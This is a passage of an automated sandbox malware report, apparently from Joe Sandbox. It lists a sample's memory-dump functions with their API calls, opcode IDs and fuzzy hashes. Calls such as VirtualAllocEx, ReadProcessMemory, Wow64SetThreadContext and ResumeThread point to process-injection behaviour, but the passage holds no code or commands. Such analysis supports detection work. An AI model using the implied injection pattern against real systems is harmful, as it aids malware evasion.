                                              • Instruction Fuzzy Hash: 2221E5B5900248DFDB10DF9AD584ADEBBF9FB48310F14801AE915A3350D379A950CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05104A60 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05104A2E,?,?,?,?,?), ref: 05104AEF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: f6587f740d3e174c49d002ff019aa0a9f8d593c6b17fa637ee6fc14725bfaec8
                                              • Instruction ID: 4337ab119f585f1120ad7efd46a93e34151dd29e2e4ad1a3a0e99f02ab444ea2
                                              • Opcode Fuzzy Hash: f6587f740d3e174c49d002ff019aa0a9f8d593c6b17fa637ee6fc14725bfaec8
                                              • Instruction Fuzzy Hash: 6821E5B5900248DFDB10CF9AD585AEEBBF8FB48310F14841AE918A3350D378A950CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D07678 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05D076F8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 255f2f28ba0ef680ac3286d431ad1db502ed5138120edf75a1125788de9809a9
                                              • Instruction ID: f67a5a107e453a9c590f3c725441cea24ceb3bdac7c6b54c31c5971c4d4427aa
                                              • Opcode Fuzzy Hash: 255f2f28ba0ef680ac3286d431ad1db502ed5138120edf75a1125788de9809a9
                                              • Instruction Fuzzy Hash: 8B2128B18002499FCB10DFAAC881AEEFBF5FF48310F50842AE519A7250D778A540CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D073F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D0746E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 7fca9495dab77c1188a146fcd00f0332e62a88e5e1dae29da1350d4773e1fe9e
                                              • Instruction ID: 1fd957027228ef2f1c780ebd40a36aff23abd7dc05e90baeda6177563fed53e9
                                              • Opcode Fuzzy Hash: 7fca9495dab77c1188a146fcd00f0332e62a88e5e1dae29da1350d4773e1fe9e
                                              • Instruction Fuzzy Hash: 022115B19002098FDB50DFAEC485BEEBBF4FF48314F14842AD559A7240DB78A945CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D073E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D0746E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 0d012e10325529d02a1dda2055ff2031b6ae6f016137f0b632fe1a67270a8cea
                                              • Instruction ID: 25cbb1845e91514191900f3c1e3fdf1cb469eec4c151481b0429c582e702d9a1
                                              • Opcode Fuzzy Hash: 0d012e10325529d02a1dda2055ff2031b6ae6f016137f0b632fe1a67270a8cea
                                              • Instruction Fuzzy Hash: 232125B59002098FDB10DFA9C5857EEBBF4EF48214F14842AD459A7241DB78A985CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05101F98 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05102861,00000800,00000000,00000000), ref: 05102A72
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: f388eef304ffb4e20268562a56505e9c62582fcf4a9f457077b44a99096a2c02
                                              • Instruction ID: 9ba3a89051b58414afb699071e90b5c13efc3ea6eb6e4ba88fa321dabf95644c
                                              • Opcode Fuzzy Hash: f388eef304ffb4e20268562a56505e9c62582fcf4a9f457077b44a99096a2c02
                                              • Instruction Fuzzy Hash: 1D1133B6C00219CFDB20CF9AC448A9EFBF4EB48310F10842AE429A7640C7B9A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05102A00 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05102861,00000800,00000000,00000000), ref: 05102A72
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 1a0ea0e17fd32777b5c115cf3f36d4d6c9d7f4c178bcc2e3ee15ed33b2eae78e
                                              • Instruction ID: f6eacda014253b72792a9ba500a001b89bdc17d6125972083adcf4ecb9f49493
                                              • Opcode Fuzzy Hash: 1a0ea0e17fd32777b5c115cf3f36d4d6c9d7f4c178bcc2e3ee15ed33b2eae78e
                                              • Instruction Fuzzy Hash: F61133BA800249CFDB20CFAAC548ADEFBF4AB48310F14852AD429A7610C779A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D074C0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05D07536
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 8d132619043b32d11eaebcdc41b98e04bc91b5d0c722341b2d34890eea6250c0
                                              • Instruction ID: e3c6620b4b0baac2bf3db057ec111a6caf40a807df2846fb88f33adb95db4324
                                              • Opcode Fuzzy Hash: 8d132619043b32d11eaebcdc41b98e04bc91b5d0c722341b2d34890eea6250c0
                                              • Instruction Fuzzy Hash: 621126B69002499FCB10DFA9C945BEEBFF5FF88310F14881AE519A7250C779A541CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D074C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05D07536
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: e0a81884747c90ceef94cb1db633a4bba4e969660c39cbcb44918d28eefcc944
                                              • Instruction ID: 43edce13dd25f75ad724de93138c3fb92f687d77bc2834f39425f549001ee990
                                              • Opcode Fuzzy Hash: e0a81884747c90ceef94cb1db633a4bba4e969660c39cbcb44918d28eefcc944
                                              • Instruction Fuzzy Hash: 471126759002499FCB10DFAAC845BEEBFF5EF88310F10841AE519A7250C779A540CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D06F00 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a88216f05db83d72503b5201e19a1765e9734b557c79e78edee8dbabbba81bb7
                                              • Instruction ID: 26799376b8d8faefd507be349924fbee041c4f3894e972fa454c439ccbae83e2
                                              • Opcode Fuzzy Hash: a88216f05db83d72503b5201e19a1765e9734b557c79e78edee8dbabbba81bb7
                                              • Instruction Fuzzy Hash: A91146B1D002488BCB20DFAAC4457EEFBF9EF88314F24841AD519A7240CB39A944CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D06F08 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a84ca0d5dfbf8fc0bc612e109fc648ffc47b050a6a23a44b7600f761e29f34dd
                                              • Instruction ID: bacea7b80a2081c787d3dd9fb3e5684ffe5aa17702c4bb0617732072f7d1c1ac
                                              • Opcode Fuzzy Hash: a84ca0d5dfbf8fc0bc612e109fc648ffc47b050a6a23a44b7600f761e29f34dd
                                              • Instruction Fuzzy Hash: E91128B19002498FCB20DFAAC4457EEFBF5EF88314F20841AD559A7240CB79A544CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D0BB09 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05D0BB6D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 07b8f67dff76d7a12f4b781a2a50d22ca4eb43a73bead1c21c65f1096bd611b5
                                              • Instruction ID: 50ec8d9db3b6318749e4f4199d366858fa308999238388fd5c240c89c6ae088c
                                              • Opcode Fuzzy Hash: 07b8f67dff76d7a12f4b781a2a50d22ca4eb43a73bead1c21c65f1096bd611b5
                                              • Instruction Fuzzy Hash: 391103B58007499FDB10DF9AD889BDEFBF8FB48720F10841AE518A7250D379A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D0875C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05D0BB6D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 64d6886edd09939fb71441d353bc0bc1917866cf148459dcee4a037b5281bdb3
                                              • Instruction ID: 960fc0ba77f19779294d2fe9a8533a56eff0c4603d61c2593d4a3754d0c66fd1
                                              • Opcode Fuzzy Hash: 64d6886edd09939fb71441d353bc0bc1917866cf148459dcee4a037b5281bdb3
                                              • Instruction Fuzzy Hash: 0D11F5B58043499FDB10DF99D445BDEBBF8EB48310F10845AE518A7250C379A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05102780 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 051027E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 033b3aa42baa359a8726fa71c2266b0b9c4582e7262dc8e3efee197d4418bbd2
                                              • Instruction ID: bb7557d51ad28a3f8db7f3295a6e3d3a6800d729053ced99ac3dac23e864c85a
                                              • Opcode Fuzzy Hash: 033b3aa42baa359a8726fa71c2266b0b9c4582e7262dc8e3efee197d4418bbd2
                                              • Instruction Fuzzy Hash: 1111E0B9C006498FCB10DF9AD448ADEFBF8EF89310F10846AD829B7250D379A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00DAD034 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2014838056.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_dad000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 85fc898e7ce12870dba314df17a30079a7a29e1d4a60901b995ac2b6b8e11244
                                              • Instruction ID: 545439c9ae6b9050f8b18379d1fb2031af2c3fdf806dc2d4a620d0ca1fb1e451
                                              • Opcode Fuzzy Hash: 85fc898e7ce12870dba314df17a30079a7a29e1d4a60901b995ac2b6b8e11244
                                              • Instruction Fuzzy Hash: D631AF7554C3809FD703DF20D894715BFB2AB57314F1885EAC8868B6A3C23A980ACB72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00DAD055 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2014838056.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_dad000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb5259e0bee6343a0efc9f319110e37da8e9b47ae3b7b729e157ac0c4d83ab07
                                              • Instruction ID: 7aecd3082d249cda79be0a9571e372305e6ffcf2418007d66fb19acae6fda2f5
                                              • Opcode Fuzzy Hash: bb5259e0bee6343a0efc9f319110e37da8e9b47ae3b7b729e157ac0c4d83ab07
                                              • Instruction Fuzzy Hash: 812191755483808FD702CF14D980715BF72EB56314F28C5EAD8458B6A3C33A981ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00DAD0DC Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2014838056.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_dad000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0c2d84a01322a29dc8a92e3ef93d1caebea4030179cf1fb704244f812b7d97e1
                                              • Instruction ID: f908ebbf1aeae509e7b373f61e4564c9c0ba1ee9414dd07572e7b240eda7afc3
                                              • Opcode Fuzzy Hash: 0c2d84a01322a29dc8a92e3ef93d1caebea4030179cf1fb704244f812b7d97e1
                                              • Instruction Fuzzy Hash: B0210471504304DFDB04DF24D9C0B26BB66FB89314F24C56DD94A4B796C33AD846CAB2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00DAD294 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2014838056.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_dad000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5805f2710ec4a785d54d60f1231214644121b6362f6b4a7c39ffa56c7d5258cb
                                              • Instruction ID: a81ee4d1a23d703cd8cc34e4ce77ad15bc9f55935ac49256b8aa1e8609641bc7
                                              • Opcode Fuzzy Hash: 5805f2710ec4a785d54d60f1231214644121b6362f6b4a7c39ffa56c7d5258cb
                                              • Instruction Fuzzy Hash: 19210775504204DFDF04DF14D5C4B26BFA6FB85314F24C56DD94A4B656C33AD806CA72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00DAD28F Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2014838056.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_dad000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: 30a6b6151d178361dac6ab922d6e78d8411c604b8b2ee5026ae4e93b93efec99
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: C0119D75504280DFDB06CF14D5C4B15FFB2FB85314F28C6A9D94A4B656C33AD84ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 05107338 Relevance: .3, Instructions: 315COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a054c77bed5a0dc53b6c9cd40e3c00932dcf018138479badaf1bd7de88a35b4
                                              • Instruction ID: f057bbe51df8409059fb5dc8129e19e2be92cb4a3fba06b4260d2e25b89dedd7
                                              • Opcode Fuzzy Hash: 2a054c77bed5a0dc53b6c9cd40e3c00932dcf018138479badaf1bd7de88a35b4
                                              • Instruction Fuzzy Hash: 001290B2501B468EE751DF66ED4C38B7BA2BB85318BA04709D2613B2F1DBB8114ECF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D04C00 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15a2ab2aa1995acb951b848dd4157ccf37e34e8284957f023714f053aaf02e31
                                              • Instruction ID: a5470573f135f2b8c750c31ce9ab5e39c9daabef3cf513c49d3f13e5c829b53d
                                              • Opcode Fuzzy Hash: 15a2ab2aa1995acb951b848dd4157ccf37e34e8284957f023714f053aaf02e31
                                              • Instruction Fuzzy Hash: D2E11D74E002198FCB14DFA9C580AAEFBF2FF89305F24915AE515AB359D730A942CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D047C8 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7136efc5c0fc88541d99ad99d81536c2d73070faaabe28697fb682db8697bb0b
                                              • Instruction ID: 3178297a256b748be1e60f0e2aa5e79e43c6bdca6bde750bf43345923ebb524b
                                              • Opcode Fuzzy Hash: 7136efc5c0fc88541d99ad99d81536c2d73070faaabe28697fb682db8697bb0b
                                              • Instruction Fuzzy Hash: 1DE12E74E042198FCB14DFA9C580AAEFBF2FF89305F24816AE515AB355C731A941CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D06FB8 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37fcf1eb55a8fa011fa2f353e36bd27714388eb07f63c441f556f02f58730e44
                                              • Instruction ID: b92b83813824d376e13c11555f943eea1d309be498ea8731ce63e6285e6583f7
                                              • Opcode Fuzzy Hash: 37fcf1eb55a8fa011fa2f353e36bd27714388eb07f63c441f556f02f58730e44
                                              • Instruction Fuzzy Hash: D4E11C74E002198FCB14DFA8C580AAEFBF2FF89305F24915AE415AB399D770A941CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D066E0 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 972d5a723dd54bb48191119e86e2165d729e133d66eddd6e70e2c40dd03e791f
                                              • Instruction ID: c87e3b92443fea372a2b150b156e2f17f30e58d5c2df6f4ae5f7a893f9741aad
                                              • Opcode Fuzzy Hash: 972d5a723dd54bb48191119e86e2165d729e133d66eddd6e70e2c40dd03e791f
                                              • Instruction Fuzzy Hash: 86E1FC74E002198FCB14DFA9C590AAEBBF2FF89305F249169E415AB399D730E941CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D062A8 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c099ac276baedf9ef1d67979b1ca5522c9a74fd71052fca965e7a4d4d9ee839c
                                              • Instruction ID: 262aab3c36ad3487a9f6b82652ef97de9538873e88e683d123c06be9c491f318
                                              • Opcode Fuzzy Hash: c099ac276baedf9ef1d67979b1ca5522c9a74fd71052fca965e7a4d4d9ee839c
                                              • Instruction Fuzzy Hash: B9E1FB74E042198FCB14DFA9C580AAEBBB2FF89305F249159E415AB399D730E942CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00E4E400 Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2016607822.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e40000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5fad06584ef619a2441afd9295cb0ca660a0406bc94995aa4c9491f098479883
                                              • Instruction ID: 245843e2ab6742238ece091c64a0c6363b798b302db888adea0c492b63cb5b1c
                                              • Opcode Fuzzy Hash: 5fad06584ef619a2441afd9295cb0ca660a0406bc94995aa4c9491f098479883
                                              • Instruction Fuzzy Hash: F4D1E831D2075A8ACB11EF64D994A9DB7B5FF95300F10CB9AE0093B224EB706AC9CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051053AC Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7bc4fd2f3a1f0a44d17c43db1e0d6e03ce0fdf96ba4c53d7a8e02dcda53e6acd
                                              • Instruction ID: 7867258acc090f753a4e4fe4ca521eb4fbc46801c5fa535c1d8aad0392dfbdd5
                                              • Opcode Fuzzy Hash: 7bc4fd2f3a1f0a44d17c43db1e0d6e03ce0fdf96ba4c53d7a8e02dcda53e6acd
                                              • Instruction Fuzzy Hash: 20A16031A00219CFCF09DFB5C9845DEB7B2FF84301B15956AE806AB2A5EBB1D955CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05107329 Relevance: .2, Instructions: 222COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06f92f03b9419879d134b39d8fcfb541872359b7382d7d4e62c75fb2fe492616
                                              • Instruction ID: 69b5df121990fb92b6ecff28134206808bb6aab4f3351c3c4da5f2adc55e4e68
                                              • Opcode Fuzzy Hash: 06f92f03b9419879d134b39d8fcfb541872359b7382d7d4e62c75fb2fe492616
                                              • Instruction Fuzzy Hash: FFC1E4B2900B468ED711DF66EC4828BBBB2BB85328F654719D2617B2F1DBB4144ECF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D066CF Relevance: .1, Instructions: 135COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63ecbb87bbb264c414fad0451cf44428f94d0067ded0af1fa3b671c6aa79b55d
                                              • Instruction ID: c56817dc4838a29ff5d6d434cbbd630eaccb525b096211caadaf22b9e27a789a
                                              • Opcode Fuzzy Hash: 63ecbb87bbb264c414fad0451cf44428f94d0067ded0af1fa3b671c6aa79b55d
                                              • Instruction Fuzzy Hash: 4851F974E042198BDB14DFA9C5806AEBBF2FF89305F24C16AD419AB356D730A942CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D06298 Relevance: .1, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: af5279990e196cd15faad9fc8a37a390f9f2d8ebe0e092d6480064612b329f87
                                              • Instruction ID: 6cc06aaa369be11262f82465bbc1ad1314b837428164379c9e0db5f52249ec03
                                              • Opcode Fuzzy Hash: af5279990e196cd15faad9fc8a37a390f9f2d8ebe0e092d6480064612b329f87
